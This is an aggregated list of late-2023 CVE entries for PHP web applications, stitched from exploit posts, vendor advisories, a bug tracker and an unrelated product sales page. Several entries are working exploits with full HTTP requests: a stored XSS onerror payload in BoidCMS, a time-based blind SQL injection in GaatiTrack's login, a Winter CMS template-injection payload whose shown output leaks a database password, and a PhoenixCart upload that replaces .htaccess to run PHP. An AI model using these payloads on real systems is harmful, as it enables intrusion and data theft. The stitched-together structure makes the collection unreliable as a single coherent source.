BoidCMS 2.0.1 is vulnerable to Multiple Stored Cross-Site Scripting (XSS) issues via the title, subtitle, footer, or keywords parameter in a page=create action.

    # Exploit Title: BoidCMS v2.0.1 - Multiple Stored XSS# Date: 13/11/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://boidcms.github.io/#/# Software Link: https://github.com/BoidCMS/BoidCMS/archive/refs/tags/v2.0.1.zip# Version: v2.0.1# Tested on: Windows 10, PHP 8.2.4, Apache 2.4.56# CVE: CVE-2023-48824Descriptions:BoidCMS v2.0.1 is vulnerable to Multiple Stored Cross-Site Scripting(XSS) Authenticated vulnerabilities in the "title, subtitle, footer,keywords" parameters of&nbsp;settings, create page.Steps to Reproduce:1. Request:POST /BoidCMS/admin?page=create HTTP/1.1Host: 192.168.1.74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/119.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: multipart/form-data;boundary=---------------------------9882691211259772119227456445Content-Length: 1492Origin: http://192.168.1.74Connection: closeReferer: http://192.168.1.74/BoidCMS/admin?page=createCookie: PHPSESSID=51i07vv0i4bqf0s9sl14tshq20;KOD_SESSION_SSO=8lu85nmqbd7o912f2lldm1g08k;KOD_SESSION_ID_53f4f=p7am25v0dladkuqetsqer4mdhcUpgrade-Insecure-Requests: 1-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="type"post-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="title"test-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="descr"test-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="keywords"test-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="content"test-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="permalink"-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="tpl"theme.php-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="thumb"-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="date"2023-12-02T19:41-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="pub"true-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="token"83f330c1fea7a77a033324b848b5cd623d17d5cf25de1975ff2cce32badbe9cd-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="create"Create-----------------------------9882691211259772119227456445--2. Now use xss payload "><img src=x onerror=alert(1)> on "title,subtitle, footer, keywords" parameters.3. Save and check home.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48824)

CVE-2023-48824: BoidCMS 2.0.1 Cross Site Scripting ≈ Packet Storm

A Blind SQL injection issue in ajax.php in GaatiTrack Courier Management System 1.0 allows an unauthenticated attacker to inject a payload via the email parameter during login.

    # Exploit Title: GaatiTrack Courier Management System v1.0 - SQL Injection# Date: 13/11/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://www.mayurik.com/# Software Link:https://www.mayurik.com/source-code/P0998/best-courier-management-system-project-in-php# Version: v1.0# Tested on: Windows 10, PHP 8.2.4, Apache 2.4.56# CVE: CVE-2023-48823Descriptions:Blind SQL injection in ajax.php in GaatiTrack Courier ManagementSystem v1.0 allows an unauthenticated attacker to insert malicious SQLqueries via email parameter.Steps to Reproduce:1. Request:POST /gaatitrack/ajax.php?action=login HTTP/1.1Host: 192.168.1.74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/119.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 83Origin: http://192.168.1.74Connection: closeReferer: http://192.168.1.74/gaatitrack/login.phpCookie: PHPSESSID=abl1dci7hob2f90sf5ag9k00mp;KOD_SESSION_SSO=8lu85nmqbd7o912f2lldm1g08k;KOD_SESSION_ID_53f4f=p7am25v0dladkuqetsqer4mdhcemail=test%40test.com&password=1234562. Now use blind sqli query after email parameter. So your request data will be:POST /gaatitrack/ajax.php?action=login HTTP/1.1Host: 192.168.1.74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/119.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 83Origin: http://192.168.1.74Connection: closeReferer: http://192.168.1.74/gaatitrack/login.phpCookie: PHPSESSID=abl1dci7hob2f90sf5ag9k00mp;KOD_SESSION_SSO=8lu85nmqbd7o912f2lldm1g08k;KOD_SESSION_ID_53f4f=p7am25v0dladkuqetsqer4mdhcemail=test%40test.com'XOR(if(now()=sysdate()%2Csleep(4)%2C0))XOR'&password=123456## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48823)

CVE-2023-48823: GaatiTrack Courier Management System 1.0 SQL Injection ≈ Packet Storm

A Cross Site Scripting vulnerability in Availability Booking Calendar 5.0 allows an attacker to inject JavaScript via the name, plugin_sms_api_key, plugin_sms_country_code, uuid, title, or country name parameter to index.php.

    # Exploit Title: Multiple Cross Site Scripting in PHPJabbers AvailabilityBooking Calendar v5.0# Date: 12/11/2023# Exploit Author: BugsBD Security Researcher (Orpon)# Vendor Homepage: https://www.phpjabbers.com/# Software Link:https://www.phpjabbers.com/availability-booking-calendar/#sectionDemo# Version: v5.0# Tested on: Windows 10, Linux# CVE: CVE-2023-48208Description:PHPJabbers Availability Booking Calendar v5.0 is vulnerable to MultipleStored Cross-Site Scripting (XSS) vulnerabilities in the "name,plugin_sms_api_key, plugin_sms_country_code, uuid, title, country name"parameters of index.php page.Steps to Reproduce:1. Login your panel2. Go to System Menu then click SMS Settings.3. Then use any XSS Payload in "SMS API Key", "Default Country Code" inputfield and Save.4. You will see XSS pop up.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48208)

CVE-2023-48208: PHPJabbers Availability Booking Calendar 5.0 Cross Site Scripting ≈ Packet Storm

Availability Booking Calendar 5.0 is vulnerable to Multiple HTML Injection issues via SMS API Key or Default Country Code.

    # Exploit Title: PHPJabbers Availability Booking Calendar v5.0 - HTML Injection# Date: 13/11/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://www.phpjabbers.com/# Software Link:https://www.phpjabbers.com/availability-booking-calendar/#sectionDemo# Version: v5.0# Tested on: Windows 10, Windows 11, Linux# CVE-2023-48825Descriptions:HTML injection, also known as HTML code injection or cross-sitescripting (XSS), is a web security vulnerability that allows anattacker to inject malicious code into a web page that is then viewedby other users. This can lead to various attacks, such as stealingsensitive information, session hijacking, defacement of websites, ordelivering malware to users.Steps to Reproduce:1. Login your panel2. Go to System Menu then click SMS Settings.3. Then use any HTML Tag in "SMS API Key", "Default Country Code"input field and Save.4. You will see HTML code working here.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48825)

CVE-2023-48825: PHPJabbers Availability Booking Calendar 5.0 HTML Injection ≈ Packet Storm

A Cross Site Scripting (XSS) vulnerability in Shuttle Booking Software 2.0 allows a remote attacker to inject JavaScript via the name, description, title, or address parameter to index.php.

**Shuttle Booking Software**

Simple inquiry and reservation software for booking shared airport shuttle and private transfers

Version: 1.0

The PHPJabbers Shuttle Booking Software is a point-to-point transfer booking system solution designed to provide airport shuttle operators and transfer companies with the right tools to handle customer inquiries. The shuttle software can be easily custom configured to fit your business needs. It's perfectly suited for companies offering airport shared ride and charter transfer services.

**Shuttle Booking Software**

*   Highlights
*   Features
*   Demo
*   Faq
*   Knowledge Base
*   Pricing

**Product Highlights**

Integrate a smart shuttle booking system into your website and let your customers book transfers to predefined locations. Add multiple pick-up and drop-off points along with a detailed time plan. Check the key features that come standard with the script!

Shuttle Lines

Create different routes with multiple pick-up and drop-off locations, set transfer duration and prices for each line, and manage schedules.

Multiple Languages Supported

Translate the shuttle reservation software into any language and add a language bar on the front-end interface.

Manage Timetables

Create detailed arrival and departure plans for the lines added to the shuttle booking system. Request custom timetable settings from us.

Email and SMS Notifications

Use the shuttle software to enable automatic confirmations to both administrators and clients. Send them via email or SMS.

Online Bookings and Payments

Customers can quickly book a shuttle and select their preferred payment method. Various online and offline payments are supported.

Responsive Design

The shuttle software is mobile-friendly and adapts to various devices to provide an optimal customer experience and top usability.

Customer Details

Collect your clients' details and expand your customer database. Modify the checkout form by selecting standard and required fields.

PHP Source Code Customization

Buy a Developer License and modify the Shuttle Booking Software on your own. Or we can customize it for you. Compare licences...

SPECIAL OFFER

**Shuttle Booking Software for €4.59 Only**

Get all 65 PHPJabbers scripts in a bundle for just €279.

**Live Demo**

Preview both the front end and back end of the Shuttle Booking Software and test out the whole functionality.  
If you have any questions or need technical advice, go ahead and contact us.

**Shuttle Booking Software**

**Key Benefits**

Remote Hosting

High Performance

Extended Licence

Customizations

Payment Gateways

**Pricing**

You can buy the Shuttle Booking Software both with a Developer and a User License – compare them below.  
Do you need a custom modification? We'll happily do it for you! Just contact us, describe what you need, and we'll send you a quote!

Mega Sale deal

€4.59

per script

Free installation support

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Contact us and you'll receive quotation for the custom changes you may need

buy now

Free installation support

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Modify the software on your own or contact us and we will give you a quote

buy now

Mega Sale deal

€4.59 per script

Get 65 PHP Scripts

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Modify the software on your own or contact us and we will give you a quote

buy now

LIMITED OFFER

Get the Mega Sale bundle deal with all the PHP scripts you'll ever need for a total of

€279

VIEW DETAILS

**Testimonials**

Let our clients share their experience with the shuttle reservation software and how our software solution has improved their online business.

“

Fantastic company and people. Very helpful and customize the scripts brilliantly. First class and great prices. Thoroughly recommend to everyone.

Roger Ousby

“

Hi PHPJabbers,  
I would like to say that your products are uniquely good. Really not an exaggeration, I am very very satisfied with the software and the support.

Veith Savic

“

Thanks a bunch! :) PHPJabbers will be my first visit whenever I need high quality PHP scripts and support! Cheers!

Joe Reed

**FAQ & Knowledge Base**

Pre-Sale FAQ

Read the most Frequently Asked Questions about this script, its features and use.

Support Service FAQ

Read more about our Support Service and how we can help you install Shuttle Booking Software.

Custom Mods FAQ

Do you need something changed? We offer customization services.

How to install a Script

See how easy it is to install the script. Just follow the instructions or leave it all to us.

PHP Framework Used

We use our own in-house build framework which is really easy to understand and work with.

Our Services

We offer a wide range of web development       services.

License Types Explained

User and Developer licence available. We also have a special Extended Licence for webmasters.

Didn’t find exactly what you were looking for?

Contact Us

**Related Scripts**

**Car Rental Script**

**Limo Booking Software**

**Taxi Booking Script**

**Bus Reservation System**

**Car Park Booking System**

**Appointment Scheduler**

CVE-2023-48172: Shuttle Booking System | PHPJabbers

The System Dashboard plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the sd_php_info() function hooked via an AJAX action in all versions up to, and including, 2.8.7. This makes it possible for authenticated attackers, with subscriber-level access and above, to retrieve sensitive information provided by PHP info.

**Description**

The System Dashboard plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the sd\_php\_info() function hooked via an AJAX action in all versions up to, and including, 2.8.7. This makes it possible for authenticated attackers, with subscriber-level access and above, to retrieve sensitive information provided by PHP info.

**References**

*   plugins.trac.wordpress.org
*   plugins.trac.wordpress.org

**Share**

**1 affected software package**

Software Type

Plugin

Software Slug

system-dashboard (view on wordpress.org)

Patched?

Yes

Remediation

Update to version 2.8.8, or a newer patched version

Affected Version

*   <= 2.8.7

Patched Version

*   2.8.8

This record contains material that is subject to copyright.

**Copyright 2012-2023 Defiant Inc.**

**License:** Defiant hereby grants you a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare derivative works of, publicly display, publicly perform, sublicense, and distribute this software vulnerability information. Any copy of the software vulnerability information you make for such purposes is authorized provided that you include a hyperlink to this vulnerability record and reproduce Defiant's copyright designation and this license in any such copy. **Read more.**

**Copyright 1999-2023 The MITRE Corporation**

**License:** CVE Usage: MITRE hereby grants you a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare derivative works of, publicly display, publicly perform, sublicense, and distribute Common Vulnerabilities and Exposures (CVE®). Any copy you make for such purposes is authorized provided that you reproduce MITRE's copyright designation and this license in any such copy. **Read more.**

Have information to add, or spot any errors? Contact us at wfi-support@wordfence.com so we can make any appropriate adjustments.

Did you know Wordfence Intelligence provides free personal and commercial API access to our comprehensive WordPress vulnerability database, along with a free webhook integration to stay on top of the latest vulnerabilities added and updated in the database? Get started today!

Learn more

Want to get notified of the latest vulnerabilities that may affect your WordPress site?  
Install Wordfence on your site today to get notified immediately if your site is affected by a vulnerability that has been added to our database.

Get Wordfence

The Wordfence Intelligence WordPress vulnerability database is completely free to access and query via API. Please review the documentation on how to access and consume the vulnerability data via API.

Documentation

CVE-2023-5711: System Dashboard <= 2.8.8 - Missing Authorization to Information Disclosure (sd_php_info) — Wordfence Intelligence

In the module "Product Tag Icons Pro" (ticons) before 1.8.4 from MyPresta.eu for PrestaShop, a guest can perform SQL injection. The method TiconProduct::getTiconByProductAndTicon() has sensitive SQL calls that can be executed with a trivial http call and exploited to forge a SQL injection.

**IMPORTANT NOTICE**: DO NOT REPORT VULNERABILITIES SOLELY TO THE AUTHOR OR MARKETPLACE.

We urge you to report any vulnerabilities directly to us. Our mission is to ensure the safety and security of the PrestaShop ecosystem. Unfortunately, many module developers may not always recognize or acknowledge the vulnerabilities in their code, whether due to lack of awareness, or inability to properly evaluate the associated risk, or other reasons.

Given the rise in professional cybercrime networks actively seeking out these vulnerabilities, it's crucial that any potential threats are promptly addressed and the community is informed. The most effective method to do this is by publishing a CVE, like the one provided below.

Should you discover any vulnerabilities, **please report them to us at: report\[@\]security-presta.org** or visit https://security-presta.org for more information.

Every vulnerability report helps make the community more secure, and we are profoundly grateful for any information shared with us.

In the module “Product Tag Icons Pro” (ticons) up to version 1.8.4 from My Presta.eu for PrestaShop, a guest can perform SQL injection in affected versions.

**Summary**

*   **CVE ID**: CVE-2023-46353
*   **Published at**: 2023-11-28
*   **Platform**: PrestaShop
*   **Product**: ticons
*   **Impacted release**: <= 1.8.3 (1.8.4 fixed the vulnerability)
*   **Product author**: MyPresta.eu
*   **Weakness**: CWE-89
*   **Severity**: critical (9.8)

**Description**

The method TiconProduct::getTiconByProductAndTicon() has sensitive SQL calls that can be executed with a trivial http call and exploited to forge a SQL injection.

**CVSS base metrics**

*   **Attack vector**: network
*   **Attack complexity**: low
*   **Privilege required**: none
*   **User interaction**: none
*   **Scope**: unchanged
*   **Confidentiality**: high
*   **Integrity**: high
*   **Availability**: high

**Vector string**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**Possible malicious usage**

*   Obtain admin access
*   Remove data from the associated PrestaShop
*   Copy/paste data from sensitive tables to FRONT to expose tokens and unlock admins’s ajax scripts
*   Rewrite SMTP settings to hijack emails

**Patch from 1.8.3**

    --- 1.8.3/modules/ticons/models/TiconProduct.php
    +++ 1.8.4/modules/ticons/models/TiconProduct.php
    ...
            LEFT JOIN `' . _DB_PREFIX_ . 'ticon` c ON (a.`id_ticon` = c.`id_ticon`)
    -       LEFT JOIN `' . _DB_PREFIX_ . 'product_lang` b ON (b.`id_product` = a.`id_product` AND b.`id_lang` = ' . (int)Context::getContext()->language->id . ') WHERE a.id_product ="' . $id_product . '" ' . Shop::addSqlRestriction(false, 'b') . ' AND a.id_ticon="' . $id_ticon . '"');
    +       LEFT JOIN `' . _DB_PREFIX_ . 'product_lang` b ON (b.`id_product` = a.`id_product` AND b.`id_lang` = ' . (int)Context::getContext()->language->id . ') WHERE a.id_product ="' . (int) $id_product . '" ' . Shop::addSqlRestriction(false, 'b') . ' AND a.id_ticon="' . (int) $id_ticon . '"');
        }
    

**Other recommendations**

*   It’s recommended to upgrade to the latest version of the module **ticons**.
*   Upgrade PrestaShop to the latest version to disable multiquery executions (separated by “;”) - be warned that this functionality **WILL NOT** protect your SHOP against injection SQL which uses the UNION clause to steal data.
*   Change the default database prefix ps_ with a new longer, arbitrary prefix. Nevertheless, be warned that this is useless against blackhats with DBA senior skill because of a design vulnerability in DBMS
*   Activate OWASP 942’s rules on your WAF (Web application firewall), be warned that you will probably break your backoffice and you will need to pre-configure some bypasses against this set of rules.

**Timeline**

Date

Action

2023-08-02

Issue discovered during a code review by TouchWeb.fr

2023-08-02

Contact Author

2023-09-25

Author provide a patch

2023-10-17

Request a CVE ID

2023-10-23

Received CVE ID

2023-11-28

Publish this security advisory

**Links**

*   Author product page
*   National Vulnerability Database

**DISCLAIMER:** _The French Association Friends Of Presta (FOP) acts as an intermediary to help hosting this advisory. While we strive to ensure the information and advice provided are accurate, FOP cannot be held liable for any consequences arising from reported vulnerabilities or any subsequent actions taken._

CVE-2023-46353: [CVE-2023-46353] Improper neutralization of SQL parameter in My Presta.eu - Product Tag Icons Pro for PrestaShop

An issue in Netgate pfSense Plus v.23.05.1 and before and pfSense CE v.2.7.0 allows a remote attacker to execute arbitrary code via a crafted request to the packet_capture.php file.

closed

 

**\`\`packet\_capture.php\`\` uses \`\`count\`\` and \`\`length\`\` values in command execution without validation or encoding**

Plus Target Version:

23.09

**Description**

The packet_capture.php page uses the values of count and length when executing tcpdump and it doesn't validate that these parameters are the intended type or encode them before use.

The form type is set to 'number' but that client-side validation does not prevent clients from submitting invalid data.

Due to a lack of escaping on commands in the functions being called, it is possible to execute arbitrary commands with a properly formatted submission value for $_POST['count'] or $_POST['length'].

*   History
*   Notes
*   Property changes
*   Associated revisions

*   **Status** changed from _Confirmed_ to _Feedback_
*   **% Done** changed from _0_ to _100_

*   **Status** changed from _Feedback_ to _Resolved_

*   **Target version** changed from _2.8.0_ to _2.7.1_

*   **Category** changed from _Diagnostics_ to _Packet Capture_
*   **Private** changed from _Yes_ to _No_

Also available in: Atom PDF

CVE-2023-48123: Bug #14809: ``packet_capture.php`` uses ``count`` and ``length`` values in command execution without validation or encoding - pfSense

Winter CMS version 1.2.2 suffers from a server-side template injection vulnerability.

    # Exploit Title: Winter CMS 1.2.2 - Server-Side Template Injection (SSTI) (Authenticated)# Exploit Author: tmrswrr# Date: 12/05/2023# Vendor: https://wintercms.com/# Software Link: https://github.com/wintercms/winter/releases/v1.2.2# Vulnerable Version(s): 1.2.2#Tested : https://www.softaculous.com/demos/WinterCMS1 ) Login with admin cred and click CMS > Pages field > Plugin components >     https://demos6.demo.com/WinterCMS/backend/cms#secondarytab-cmslangeditormarkup2 ) Write SSTI payload : {{7*7}}3 ) Save it , Click Priview :     https://demos6.demo.com/WinterCMS/demo/plugins4 ) You will be see result :     49 Payload :    {{ dump() }} Result :         "*::database" => array:4 [▼          "default" => "mysql"          "connections" => array:4 [▼            "sqlite" => array:5 [▼              "database" => "/home/soft/public_html/WinterCMSmcviotyn9i/storage/database.sqlite"              "driver" => "sqlite"              "foreign_key_constraints" => true              "prefix" => ""              "url" => null            ]            "mysql" => array:15 [▼              "charset" => "utf8mb4"              "collation" => "utf8mb4_unicode_ci"              "database" => "soft_pw3qsny"              "driver" => "mysql"              "engine" => "InnoDB"              "host" => "localhost"              "options" => []              "password" => "8QSz9(pT)3"              "port" => 3306              "prefix" => ""              "prefix_indexes" => true              "strict" => true              "unix_socket" => ""              "url" => null              "username" => "soft_pw3qsny"            ]            "pgsql" => array:12 [▶]            "sqlsrv" => array:10 [▶]          ]          "migrations" => "migrations"          "redis" => array:4 [▼            "client" => "phpredis"            "options" => array:2 [▼              "cluster" => "redis"              "prefix" => "winter_database_"            ]            "default" => array:5 [▼              "database" => "0"              "host" => "127.0.0.1"              "password" => null              "port" => "6379"              "url" => null            ]            "cache" => array:5 [▼              "database" => "1"              "host" => "127.0.0.1"              "password" => null              "port" => "6379"              "url" => null            ]          ]        ]      ]

Winter CMS 1.2.2 Server-Side Template Injection

CE Phoenixcart version 1.0.8.20 suffers from a remote shell upload vulnerability.

## Title: PhoenixCart-1.0.8.20-File-Upload-Bypass-override-htaccess-security-RCE  
## Author: nu11secur1ty  
## Date: 12/06/2023  
## Vendor: https://phoenixcart.org/index.php  
## Software: https://github.com/CE-PhoenixCart/PhoenixCart/archive/master.zip  
## Reference: https://portswigger.net/web-security/file-upload,  
https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload

## Description:  
The Categories/Products Product Images upload function, is ABSOLUTELY  
NOT SANITIZING WELL for file uploading from any type of extension!  
In this case, you can see a bypassing of .HTACCESS SECURITY file and  
uploading an info.php exploit file which info.php can be executed from  
everywhere for dumping the all information about the server! This can  
be done on the demo server! Please do not do this! I am a Penetration  
Tester, not a stupid cracker, and that's why I downloaded it,  
installed it, and tested it!  
If you want to test it yourself please download it, install it, and test it!  
Thank you all!

STATUS: HIGH-CRITICAL Vulnerability  
[+]Exploit execution:  
```POST  
POST /PhoenixCart/admin/catalog.php?cPath=&action=update_product&pID=10 HTTP/1.1  
Host: pwnedhost7.com  
Content-Length: 2952  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
Origin: http://pwnedhost7.com  
Content-Type: multipart/form-data;  
boundary=----WebKitFormBoundaryeDPXR7DpYcn3eWA1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Referer: http://pwnedhost7.com/PhoenixCart/admin/catalog.php?cPath=&pID=10&action=new_product  
Accept-Encoding: gzip, deflate, br  
Accept-Language: en-US,en;q=0.9  
Cookie: cepcAdminID=ukrk3ssr0jd6iqsnn9ofuccmbt  
Connection: close

------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="formid"

733e378dc8154accdbfd80762cc385f48d5566560ac3b264db19393f9beb268e  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_date_added"

2023-12-06 11:36:36  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_status"

1  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_quantity"

0  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_date_available"

2023-12-14 00:00:00  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="manufacturers_id"

------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_model"

------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_tax_class_id"

1  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_price"

1000.0000  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_price_gross"

1070  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_weight"

1.00  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_gtin"

00000000000001  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_name[1]"

pwned  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_description[1]"

pwned your services  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_url[1]"

------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_seo_title[1]"

------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_seo_description[1]"

------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_seo_keywords[1]"

------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_image"; filename=""  
Content-Type: application/octet-stream

------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_image_large_1";  
filename=".htaccess"  
Content-Type: application/octet-stream

# $Id$  
#  
# This is used to restrict access to this folder to anything other  
# than images

# Prevents any script files from being accessed from the images folder  
<FilesMatch "\.(php([0-9]|s)?|s?p?html|cgi|pl|exe)$">  
  <IfModule mod_authz_core.c>  
    # Require all denied  
  </IfModule>

  <IfModule !mod_authz_core.c>  
    Order Deny,Allow  
    # Deny from all  
    Allow from all  
  </IfModule>  
</FilesMatch>

Options -Indexes

------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_image_htmlcontent_1"

------WebKitFormBoundaryeDPXR7DpYcn3eWA1--

```

[+]Response:  
```PHP  
GET /PhoenixCart/images/info.php HTTP/1.1  
Host: pwnedhost7.com  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Accept-Encoding: gzip, deflate, br  
Accept-Language: en-US,en;q=0.9  
Connection: close  
```

## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/CE-Phoenix/2023/PhoenixCart-1.0.8.20)

## Proof and Exploit:  
[href](https://www.nu11secur1ty.com/2023/12/phoenixcart-10820-file-upload-bypass.html)

## Time spent:  
00:17:00

--   
System Administrator - Infrastructure Engineer  
Penetration Testing Engineer  
Exploit developer at https://packetstormsecurity.com/  
https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and  
https://www.exploit-db.com/  
0day Exploit DataBase https://0day.today/  
home page: https://www.nu11secur1ty.com/  
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=  
                          nu11secur1ty <http://nu11secur1ty.com/>

--   
System Administrator - Infrastructure Engineer  
Penetration Testing Engineer  
Exploit developer at https://packetstormsecurity.com/  
https://cve.mitre.org/index.html  
https://cxsecurity.com/ and https://www.exploit-db.com/  
0day Exploit DataBase https://0day.today/  
home page: https://www.nu11secur1ty.com/  
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=  
                          nu11secur1ty <http://nu11secur1ty.com/>

Tag

#php